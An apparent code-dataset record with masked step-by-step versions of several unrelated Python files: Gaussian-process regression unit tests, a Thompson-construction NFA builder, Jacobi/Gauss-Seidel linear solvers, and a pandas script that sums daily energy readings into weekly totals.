model._log_ML(model.hypers)\n L = np.linalg.cholesky(Ky)\n alpha = np.linalg.inv(Ky) @ normed.reshape((n, 1))\n assert np.isclose(model.ML, ML)\n assert np.allclose(model._K, K)\n assert np.allclose(model._Ky, Ky)\n assert np.allclose(model._L, L)\n assert np.allclose(model._alpha, alpha)\n\n\ndef test_predict():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n h = model.hypers[1:]\n m, s, normed = model._normalize(Y)\n k_star = model.kernel.cov(X_test, X, hypers=h)\n k_star_star = model.kernel.cov(X_test, X_test, hypers=h)\n K = kernel.cov(X, X, h)\n Ky = K + np.diag(model.hypers[0] * np.ones(len(K)))\n means = k_star @ np.linalg.inv(Ky) @ normed.reshape(len(Y), 1)\n means = means * s + m\n var = k_star_star - k_star @ np.linalg.inv(Ky) @ k_star.T\n var *= s ** 2\n m, v = model.predict(X_test)\n print(v)\n print(var)\n print(model.hypers[0])\n assert (np.abs(v - var) < 0.1).all()\n assert np.allclose(means[:, 0], m, rtol=1e-08, atol=0.0001)\n\n\ndef test_pickles():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n m1, v1 = model.predict(X_test)\n model.dump('test.pkl')\n new_model = gpmodel.GPRegressor.load('test.pkl')\n os.remove('test.pkl')\n m2, v2 = new_model.predict(X_test)\n assert np.allclose(m1, m2)\n assert np.allclose(v1, v2)\n\n\nif __name__ == '__main__':\n test_init()\n test_normalize()\n test_K()\n test_ML()\n test_fit()\n test_predict()\n test_pickles()\n",
"step-4": "<mask token>\nn = 200\nd = 10\nX = np.random.random(size=(n, d))\nxa = X[[0]]\nxb = X[[1]]\nXc = X[[2]]\nclass_Y = np.random.choice((1, -1), size=(n,))\nalpha = 0.1\nfunc = gpmean.GPMean(linear_model.Lasso, alpha=alpha)\nX_test = np.random.random(size=(5, d))\nkernel = gpkernel.SEKernel()\ncov = kernel.cov(X, X, hypers=(1.0, 0.5))\nvariances = np.random.random(size=(n,))\nY = np.random.multivariate_normal(np.zeros(n), cov=cov)\nY += np.random.normal(0, 0.2, n)\n\n\ndef test_init():\n model = gpmodel.GPRegressor(kernel)\n assert np.allclose(model.mean_func.mean(X), np.zeros((len(X),)))\n assert model.objective == model._log_ML\n assert model.kernel == kernel\n assert model.guesses is None\n model = gpmodel.GPRegressor(kernel, guesses=(0.1, 0.1, 0.1))\n assert model.guesses == (0.1, 0.1, 0.1)\n\n\ndef test_normalize():\n model = gpmodel.GPRegressor(kernel)\n m, s, normed = model._normalize(Y)\n assert np.isclose(m, Y.mean())\n assert np.isclose(s, Y.std())\n assert np.allclose(normed, (Y - m) / s)\n model.std = s\n model.mean = m\n assert np.allclose(Y, model.unnormalize(normed))\n\n\ndef test_K():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n K, Ky = model._make_Ks((1, 1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(np.ones(len(K))))\n model.variances = variances\n K, Ky = model._make_Ks((1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(variances))\n\n\ndef test_ML():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n model.normed_Y = model._normalize(Y)[2]\n model._ell = len(Y)\n hypers = np.random.random(size=(3,))\n y_mat = model.normed_Y.reshape((n, 1))\n K, Ky = model._make_Ks(hypers)\n first = 0.5 * y_mat.T @ np.linalg.inv(Ky) @ y_mat\n second = 0.5 * np.log(np.linalg.det(Ky))\n third = model._ell / 2.0 * np.log(2 * np.pi)\n actual = first + second + third\n assert np.isclose(actual, model._log_ML(hypers))\n\n\ndef test_fit():\n model = 
gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n assert model._n_hypers == kernel._n_hypers + 1\n assert np.allclose(model.X, X)\n assert np.allclose(model.Y, Y)\n m, s, normed = model._normalize(Y)\n assert np.allclose(model.normed_Y, normed)\n assert np.isclose(m, model.mean)\n assert np.isclose(s, model.std)\n vn, s0, ell = model.hypers\n K = kernel.cov(X, X, (s0, ell))\n Ky = K + np.diag(vn * np.ones(len(K)))\n ML = model._log_ML(model.hypers)\n L = np.linalg.cholesky(Ky)\n alpha = np.linalg.inv(Ky) @ normed.reshape((n, 1))\n assert np.isclose(model.ML, ML)\n assert np.allclose(model._K, K)\n assert np.allclose(model._Ky, Ky)\n assert np.allclose(model._L, L)\n assert np.allclose(model._alpha, alpha)\n\n\ndef test_predict():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n h = model.hypers[1:]\n m, s, normed = model._normalize(Y)\n k_star = model.kernel.cov(X_test, X, hypers=h)\n k_star_star = model.kernel.cov(X_test, X_test, hypers=h)\n K = kernel.cov(X, X, h)\n Ky = K + np.diag(model.hypers[0] * np.ones(len(K)))\n means = k_star @ np.linalg.inv(Ky) @ normed.reshape(len(Y), 1)\n means = means * s + m\n var = k_star_star - k_star @ np.linalg.inv(Ky) @ k_star.T\n var *= s ** 2\n m, v = model.predict(X_test)\n print(v)\n print(var)\n print(model.hypers[0])\n assert (np.abs(v - var) < 0.1).all()\n assert np.allclose(means[:, 0], m, rtol=1e-08, atol=0.0001)\n\n\ndef test_pickles():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n m1, v1 = model.predict(X_test)\n model.dump('test.pkl')\n new_model = gpmodel.GPRegressor.load('test.pkl')\n os.remove('test.pkl')\n m2, v2 = new_model.predict(X_test)\n assert np.allclose(m1, m2)\n assert np.allclose(v1, v2)\n\n\nif __name__ == '__main__':\n test_init()\n test_normalize()\n test_K()\n test_ML()\n test_fit()\n test_predict()\n test_pickles()\n",
"step-5": "import pytest\nimport os\n\nimport pandas as pd\nimport numpy as np\nimport math\nimport scipy\nfrom scipy import stats\nfrom sklearn import metrics, linear_model\n\nfrom gpmodel import gpkernel\nfrom gpmodel import gpmodel\nfrom gpmodel import gpmean\nfrom gpmodel import chimera_tools\n\nn = 200\nd = 10\nX = np.random.random(size=(n, d))\nxa = X[[0]]\nxb = X[[1]]\nXc = X[[2]]\nclass_Y = np.random.choice((1, -1), size=(n,))\nalpha = 1e-1\nfunc = gpmean.GPMean(linear_model.Lasso, alpha=alpha)\nX_test = np.random.random(size=(5, d))\nkernel = gpkernel.SEKernel()\ncov = kernel.cov(X, X, hypers=(1.0, 0.5))\nvariances = np.random.random(size=(n, ))\nY = np.random.multivariate_normal(np.zeros(n), cov=cov)\nY += np.random.normal(0, 0.2, n)\n\n\ndef test_init():\n model = gpmodel.GPRegressor(kernel)\n assert np.allclose(model.mean_func.mean(X), np.zeros((len(X), )))\n assert model.objective == model._log_ML\n assert model.kernel == kernel\n assert model.guesses is None\n model = gpmodel.GPRegressor(kernel, guesses=(0.1, 0.1, 0.1))\n assert model.guesses == (0.1, 0.1, 0.1)\n\n\ndef test_normalize():\n model = gpmodel.GPRegressor(kernel)\n m, s, normed = model._normalize(Y)\n assert np.isclose(m, Y.mean())\n assert np.isclose(s, Y.std())\n assert np.allclose(normed, (Y - m) / s)\n model.std = s\n model.mean = m\n assert np.allclose(Y, model.unnormalize(normed))\n\n\ndef test_K():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n K, Ky = model._make_Ks((1, 1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(np.ones(len(K))))\n model.variances = variances\n K, Ky = model._make_Ks((1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(variances))\n\n\ndef test_ML():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n model.normed_Y = model._normalize(Y)[2]\n model._ell = len(Y)\n hypers = np.random.random(size=(3,))\n y_mat = model.normed_Y.reshape((n, 1))\n K, Ky = 
model._make_Ks(hypers)\n first = 0.5 * y_mat.T @ np.linalg.inv(Ky) @ y_mat\n second = 0.5 * np.log(np.linalg.det(Ky))\n third = model._ell / 2.0 * np.log(2 * np.pi)\n actual = first + second + third\n assert np.isclose(actual, model._log_ML(hypers))\n\n\ndef test_fit():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n assert model._n_hypers == kernel._n_hypers + 1\n assert np.allclose(model.X, X)\n assert np.allclose(model.Y, Y)\n m, s, normed = model._normalize(Y)\n assert np.allclose(model.normed_Y, normed)\n assert np.isclose(m, model.mean)\n assert np.isclose(s, model.std)\n vn, s0, ell = model.hypers\n K = kernel.cov(X, X, (s0, ell))\n Ky = K + np.diag(vn * np.ones(len(K)))\n ML = model._log_ML(model.hypers)\n L = np.linalg.cholesky(Ky)\n alpha = np.linalg.inv(Ky) @ normed.reshape((n, 1))\n assert np.isclose(model.ML, ML)\n assert np.allclose(model._K, K)\n assert np.allclose(model._Ky, Ky)\n assert np.allclose(model._L, L)\n assert np.allclose(model._alpha, alpha)\n\n\ndef test_predict():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n h = model.hypers[1::]\n m, s, normed = model._normalize(Y)\n k_star = model.kernel.cov(X_test, X, hypers=h)\n k_star_star = model.kernel.cov(X_test, X_test, hypers=h)\n K = kernel.cov(X, X, h)\n Ky = K + np.diag(model.hypers[0] * np.ones(len(K)))\n means = k_star @ np.linalg.inv(Ky) @ normed.reshape(len(Y), 1)\n means = means * s + m\n var = k_star_star - k_star @ np.linalg.inv(Ky) @ k_star.T\n var *= s ** 2\n m, v = model.predict(X_test)\n print(v)\n print(var)\n print(model.hypers[0])\n assert (np.abs(v - var) < 1e-1).all()\n assert np.allclose(means[:, 0], m, rtol=1.e-8, atol=1e-4)\n\n\ndef test_pickles():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n m1, v1 = model.predict(X_test)\n model.dump('test.pkl')\n new_model = gpmodel.GPRegressor.load('test.pkl')\n os.remove('test.pkl')\n m2, v2 = new_model.predict(X_test)\n assert np.allclose(m1, m2)\n assert np.allclose(v1, v2)\n\n\nif __name__ == 
\"__main__\":\n test_init()\n test_normalize()\n test_K()\n test_ML()\n test_fit()\n test_predict()\n test_pickles()\n # To Do:\n # Test LOO_res and LOO_log_p and fitting with LOO_log_p\n # Test with mean functions\n # Test with given variances\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def check_string(automaton, word):
inicial = automata['s'].closure
for i in word:
inicial = state_list_delta(inicial, i)
return automaton['f'] in inicial
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def check_string(automaton, word):
inicial = automata['s'].closure
for i in word:
inicial = state_list_delta(inicial, i)
return automaton['f'] in inicial
def create_AFND(re):
deltas = []
initial_node = ShuntingYard.create_tree(ShuntingYard.to_rpn(re))
s = State('s')
f = State('f')
automaton = {s.name: s, f.name: f}
s.add_transition(initial_node, f)
deltas.append((s, initial_node))
while len(deltas) > 0:
origin, simbol = deltas.pop()
if not origin in automaton.values():
automaton.setdefault(origin.name, origin)
if isinstance(simbol, ShuntingYard.Node):
aux_deltas = Thompson.generic(origin, simbol)
for t in aux_deltas:
deltas.insert(0, t)
for state_name in automaton:
automaton[state_name].update_closure()
return automaton
<|reserved_special_token_1|>
from Global import *
import ShuntingYard
from Thompson import *
def check_string(automaton, word):
inicial = automata['s'].closure
for i in word:
inicial = state_list_delta(inicial, i)
return automaton['f'] in inicial
def create_AFND(re):
deltas = []
initial_node = ShuntingYard.create_tree(ShuntingYard.to_rpn(re))
s = State('s')
f = State('f')
automaton = {s.name: s, f.name: f}
s.add_transition(initial_node, f)
deltas.append((s, initial_node))
while len(deltas) > 0:
origin, simbol = deltas.pop()
if not origin in automaton.values():
automaton.setdefault(origin.name, origin)
if isinstance(simbol, ShuntingYard.Node):
aux_deltas = Thompson.generic(origin, simbol)
for t in aux_deltas:
deltas.insert(0, t)
for state_name in automaton:
automaton[state_name].update_closure()
return automaton
<|reserved_special_token_1|>
from Global import *
import ShuntingYard
from Thompson import *
def check_string(automaton, word):
inicial = automata['s'].closure
for i in word:
inicial = state_list_delta(inicial, i)
return automaton['f'] in inicial
def create_AFND(re):
deltas = []
initial_node = ShuntingYard.create_tree(ShuntingYard.to_rpn(re))
s = State('s')
f = State('f')
automaton = {s.name: s, f.name: f}
#automaton = {s.name: s}
s.add_transition(initial_node, f);
deltas.append((s,initial_node))
while len(deltas) > 0:
(origin, simbol) = deltas.pop()
if not origin in automaton.values():
automaton.setdefault(origin.name, origin)
if isinstance(simbol, ShuntingYard.Node):
aux_deltas = Thompson.generic(origin, simbol)
for t in aux_deltas:
deltas.insert(0, t)
for state_name in automaton:
automaton[state_name].update_closure()
return automaton
|
flexible
|
{
"blob_id": "9cf0174a8bd2bccbd8e5d0be1f0b031a1a23c9df",
"index": 4691,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef check_string(automaton, word):\n inicial = automata['s'].closure\n for i in word:\n inicial = state_list_delta(inicial, i)\n return automaton['f'] in inicial\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef check_string(automaton, word):\n inicial = automata['s'].closure\n for i in word:\n inicial = state_list_delta(inicial, i)\n return automaton['f'] in inicial\n\n\ndef create_AFND(re):\n deltas = []\n initial_node = ShuntingYard.create_tree(ShuntingYard.to_rpn(re))\n s = State('s')\n f = State('f')\n automaton = {s.name: s, f.name: f}\n s.add_transition(initial_node, f)\n deltas.append((s, initial_node))\n while len(deltas) > 0:\n origin, simbol = deltas.pop()\n if not origin in automaton.values():\n automaton.setdefault(origin.name, origin)\n if isinstance(simbol, ShuntingYard.Node):\n aux_deltas = Thompson.generic(origin, simbol)\n for t in aux_deltas:\n deltas.insert(0, t)\n for state_name in automaton:\n automaton[state_name].update_closure()\n return automaton\n",
"step-4": "from Global import *\nimport ShuntingYard\nfrom Thompson import *\n\n\ndef check_string(automaton, word):\n inicial = automata['s'].closure\n for i in word:\n inicial = state_list_delta(inicial, i)\n return automaton['f'] in inicial\n\n\ndef create_AFND(re):\n deltas = []\n initial_node = ShuntingYard.create_tree(ShuntingYard.to_rpn(re))\n s = State('s')\n f = State('f')\n automaton = {s.name: s, f.name: f}\n s.add_transition(initial_node, f)\n deltas.append((s, initial_node))\n while len(deltas) > 0:\n origin, simbol = deltas.pop()\n if not origin in automaton.values():\n automaton.setdefault(origin.name, origin)\n if isinstance(simbol, ShuntingYard.Node):\n aux_deltas = Thompson.generic(origin, simbol)\n for t in aux_deltas:\n deltas.insert(0, t)\n for state_name in automaton:\n automaton[state_name].update_closure()\n return automaton\n",
"step-5": "from Global import *\nimport ShuntingYard\nfrom Thompson import *\n\ndef check_string(automaton, word):\n\tinicial = automata['s'].closure\n\tfor i in word:\n\t\tinicial = state_list_delta(inicial, i)\n\treturn automaton['f'] in inicial\n\ndef create_AFND(re):\n\tdeltas = []\n\n\tinitial_node = ShuntingYard.create_tree(ShuntingYard.to_rpn(re))\n\n\ts = State('s')\n\tf = State('f')\n\tautomaton = {s.name: s, f.name: f}\n\t#automaton = {s.name: s}\n\n\ts.add_transition(initial_node, f);\n\tdeltas.append((s,initial_node))\n\n\twhile len(deltas) > 0:\n\t\t(origin, simbol) = deltas.pop()\n\t\t\n\t\tif not origin in automaton.values():\n\t\t\tautomaton.setdefault(origin.name, origin)\n\n\t\tif isinstance(simbol, ShuntingYard.Node):\n\t\t\taux_deltas = Thompson.generic(origin, simbol)\n\t\t\tfor t in aux_deltas:\n\t\t\t\tdeltas.insert(0, t)\n\n\tfor state_name in automaton:\n\t\tautomaton[state_name].update_closure()\n\n\treturn automaton\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
PRECISAO = 3
MAX_ITER = 20
def gauss_jacobi(entrada,*valores_iniciais):
tamanho = len(entrada[0])
variaveis = [*valores_iniciais[:tamanho]]
variaveism1 = [None] * (tamanho-1)
for _ in range(0,MAX_ITER):
print(variaveis)
for linha in range(tamanho-1):
soma = 0
for coluna in range(tamanho-1):
if(linha!=coluna):
soma += -entrada[linha][coluna]*variaveis[coluna]
variaveism1[linha] = round((entrada[linha][tamanho-1]+soma)/entrada[linha][linha],PRECISAO)
if(all([variaveism1[i]==variaveis[i] for i in range(tamanho-1)])):
break
variaveis = [*variaveism1]
return variaveis
def gauss_seidel(entrada,*valores_iniciais):
tamanho = len(entrada[0])
variaveis = [*valores_iniciais[:tamanho]]
antigo = [None] * (tamanho-1)
for _ in range(0,MAX_ITER):
print(variaveis)
for linha in range(tamanho-1):
soma = 0
for coluna in range(tamanho-1):
if(linha!=coluna):
soma += -entrada[linha][coluna]*variaveis[coluna]
variaveis[linha] = round((entrada[linha][tamanho-1]+soma)/entrada[linha][linha],PRECISAO)
if(all([antigo[i]==variaveis[i] for i in range(tamanho-1)])):
break
antigo = [*variaveis]
return variaveis
def main():
print()
entrada = [
[10,2,1,7],
[1,5,1,-8],
[2,3,10,6]
]
saida = gauss_jacobi(entrada,0,0,0)
print(saida)
print()
saida = gauss_seidel(entrada,0,0,0)
print(saida)
if __name__=="__main__":
main()
|
normal
|
{
"blob_id": "842f8b4de0378a2c83d22f3fd54ba4857d249597",
"index": 9323,
"step-1": "<mask token>\n\n\ndef gauss_jacobi(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n variaveism1 = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveism1[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(variaveism1[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n variaveis = [*variaveism1]\n return variaveis\n\n\ndef gauss_seidel(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n antigo = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveis[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(antigo[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n antigo = [*variaveis]\n return variaveis\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef gauss_jacobi(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n variaveism1 = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveism1[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(variaveism1[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n variaveis = [*variaveism1]\n return variaveis\n\n\ndef gauss_seidel(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n antigo = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveis[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(antigo[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n antigo = [*variaveis]\n return variaveis\n\n\ndef main():\n print()\n entrada = [[10, 2, 1, 7], [1, 5, 1, -8], [2, 3, 10, 6]]\n saida = gauss_jacobi(entrada, 0, 0, 0)\n print(saida)\n print()\n saida = gauss_seidel(entrada, 0, 0, 0)\n print(saida)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef gauss_jacobi(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n variaveism1 = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveism1[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(variaveism1[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n variaveis = [*variaveism1]\n return variaveis\n\n\ndef gauss_seidel(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n antigo = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveis[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(antigo[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n antigo = [*variaveis]\n return variaveis\n\n\ndef main():\n print()\n entrada = [[10, 2, 1, 7], [1, 5, 1, -8], [2, 3, 10, 6]]\n saida = gauss_jacobi(entrada, 0, 0, 0)\n print(saida)\n print()\n saida = gauss_seidel(entrada, 0, 0, 0)\n print(saida)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "PRECISAO = 3\nMAX_ITER = 20\n\n\ndef gauss_jacobi(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n variaveism1 = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveism1[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(variaveism1[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n variaveis = [*variaveism1]\n return variaveis\n\n\ndef gauss_seidel(entrada, *valores_iniciais):\n tamanho = len(entrada[0])\n variaveis = [*valores_iniciais[:tamanho]]\n antigo = [None] * (tamanho - 1)\n for _ in range(0, MAX_ITER):\n print(variaveis)\n for linha in range(tamanho - 1):\n soma = 0\n for coluna in range(tamanho - 1):\n if linha != coluna:\n soma += -entrada[linha][coluna] * variaveis[coluna]\n variaveis[linha] = round((entrada[linha][tamanho - 1] + soma) /\n entrada[linha][linha], PRECISAO)\n if all([(antigo[i] == variaveis[i]) for i in range(tamanho - 1)]):\n break\n antigo = [*variaveis]\n return variaveis\n\n\ndef main():\n print()\n entrada = [[10, 2, 1, 7], [1, 5, 1, -8], [2, 3, 10, 6]]\n saida = gauss_jacobi(entrada, 0, 0, 0)\n print(saida)\n print()\n saida = gauss_seidel(entrada, 0, 0, 0)\n print(saida)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "PRECISAO = 3\r\nMAX_ITER = 20\r\n\r\ndef gauss_jacobi(entrada,*valores_iniciais):\r\n tamanho = len(entrada[0])\r\n variaveis = [*valores_iniciais[:tamanho]]\r\n variaveism1 = [None] * (tamanho-1)\r\n for _ in range(0,MAX_ITER):\r\n print(variaveis)\r\n for linha in range(tamanho-1):\r\n soma = 0\r\n for coluna in range(tamanho-1):\r\n if(linha!=coluna):\r\n soma += -entrada[linha][coluna]*variaveis[coluna]\r\n variaveism1[linha] = round((entrada[linha][tamanho-1]+soma)/entrada[linha][linha],PRECISAO)\r\n if(all([variaveism1[i]==variaveis[i] for i in range(tamanho-1)])):\r\n break\r\n variaveis = [*variaveism1]\r\n return variaveis\r\n\r\ndef gauss_seidel(entrada,*valores_iniciais):\r\n tamanho = len(entrada[0])\r\n variaveis = [*valores_iniciais[:tamanho]]\r\n antigo = [None] * (tamanho-1)\r\n for _ in range(0,MAX_ITER):\r\n print(variaveis)\r\n for linha in range(tamanho-1):\r\n soma = 0\r\n for coluna in range(tamanho-1):\r\n if(linha!=coluna):\r\n soma += -entrada[linha][coluna]*variaveis[coluna]\r\n variaveis[linha] = round((entrada[linha][tamanho-1]+soma)/entrada[linha][linha],PRECISAO)\r\n if(all([antigo[i]==variaveis[i] for i in range(tamanho-1)])):\r\n break\r\n antigo = [*variaveis]\r\n return variaveis\r\n\r\n\r\ndef main():\r\n print()\r\n entrada = [\r\n [10,2,1,7],\r\n [1,5,1,-8],\r\n [2,3,10,6]\r\n ]\r\n saida = gauss_jacobi(entrada,0,0,0)\r\n print(saida)\r\n print()\r\n saida = gauss_seidel(entrada,0,0,0)\r\n print(saida)\r\n\r\nif __name__==\"__main__\":\r\n main()",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 15 06:50:48 2018
@author: Tony
"""
import glob
import pandas as pd
path =r'C:\Users\Tony\Downloads\daily_dataset\daily_dataset' # use your path
frame = pd.DataFrame()
list_ = []
def aggSumFn(path,grpByCol):
allFiles = glob.glob(path + "/*.csv")
for file_ in allFiles:
df = pd.read_csv(file_,index_col=None, header=0)
list_.append(df)
frame = pd.concat(list_)
frame[grpByCol] = pd.to_datetime(frame['day'], format='%Y-%m-%d')
frame=frame.resample('W-Mon', on=grpByCol)['energy_sum'].sum().reset_index().sort_values(by=grpByCol)
frame.columns=['week','total_consumption']
frame.to_csv(r'C:\Users\Tony\Downloads\daily_dataset\summary\weekly_dataset_summary.csv')
print('completed')
aggSumFn(path,'day')
#
|
normal
|
{
"blob_id": "252d6b381af09dbafb1d10c188eb154e53213033",
"index": 8845,
"step-1": "<mask token>\n\n\ndef aggSumFn(path, grpByCol):\n allFiles = glob.glob(path + '/*.csv')\n for file_ in allFiles:\n df = pd.read_csv(file_, index_col=None, header=0)\n list_.append(df)\n frame = pd.concat(list_)\n frame[grpByCol] = pd.to_datetime(frame['day'], format='%Y-%m-%d')\n frame = frame.resample('W-Mon', on=grpByCol)['energy_sum'].sum(\n ).reset_index().sort_values(by=grpByCol)\n frame.columns = ['week', 'total_consumption']\n frame.to_csv(\n 'C:\\\\Users\\\\Tony\\\\Downloads\\\\daily_dataset\\\\summary\\\\weekly_dataset_summary.csv'\n )\n print('completed')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef aggSumFn(path, grpByCol):\n allFiles = glob.glob(path + '/*.csv')\n for file_ in allFiles:\n df = pd.read_csv(file_, index_col=None, header=0)\n list_.append(df)\n frame = pd.concat(list_)\n frame[grpByCol] = pd.to_datetime(frame['day'], format='%Y-%m-%d')\n frame = frame.resample('W-Mon', on=grpByCol)['energy_sum'].sum(\n ).reset_index().sort_values(by=grpByCol)\n frame.columns = ['week', 'total_consumption']\n frame.to_csv(\n 'C:\\\\Users\\\\Tony\\\\Downloads\\\\daily_dataset\\\\summary\\\\weekly_dataset_summary.csv'\n )\n print('completed')\n\n\naggSumFn(path, 'day')\n",
"step-3": "<mask token>\npath = 'C:\\\\Users\\\\Tony\\\\Downloads\\\\daily_dataset\\\\daily_dataset'\nframe = pd.DataFrame()\nlist_ = []\n\n\ndef aggSumFn(path, grpByCol):\n allFiles = glob.glob(path + '/*.csv')\n for file_ in allFiles:\n df = pd.read_csv(file_, index_col=None, header=0)\n list_.append(df)\n frame = pd.concat(list_)\n frame[grpByCol] = pd.to_datetime(frame['day'], format='%Y-%m-%d')\n frame = frame.resample('W-Mon', on=grpByCol)['energy_sum'].sum(\n ).reset_index().sort_values(by=grpByCol)\n frame.columns = ['week', 'total_consumption']\n frame.to_csv(\n 'C:\\\\Users\\\\Tony\\\\Downloads\\\\daily_dataset\\\\summary\\\\weekly_dataset_summary.csv'\n )\n print('completed')\n\n\naggSumFn(path, 'day')\n",
"step-4": "<mask token>\nimport glob\nimport pandas as pd\npath = 'C:\\\\Users\\\\Tony\\\\Downloads\\\\daily_dataset\\\\daily_dataset'\nframe = pd.DataFrame()\nlist_ = []\n\n\ndef aggSumFn(path, grpByCol):\n allFiles = glob.glob(path + '/*.csv')\n for file_ in allFiles:\n df = pd.read_csv(file_, index_col=None, header=0)\n list_.append(df)\n frame = pd.concat(list_)\n frame[grpByCol] = pd.to_datetime(frame['day'], format='%Y-%m-%d')\n frame = frame.resample('W-Mon', on=grpByCol)['energy_sum'].sum(\n ).reset_index().sort_values(by=grpByCol)\n frame.columns = ['week', 'total_consumption']\n frame.to_csv(\n 'C:\\\\Users\\\\Tony\\\\Downloads\\\\daily_dataset\\\\summary\\\\weekly_dataset_summary.csv'\n )\n print('completed')\n\n\naggSumFn(path, 'day')\n",
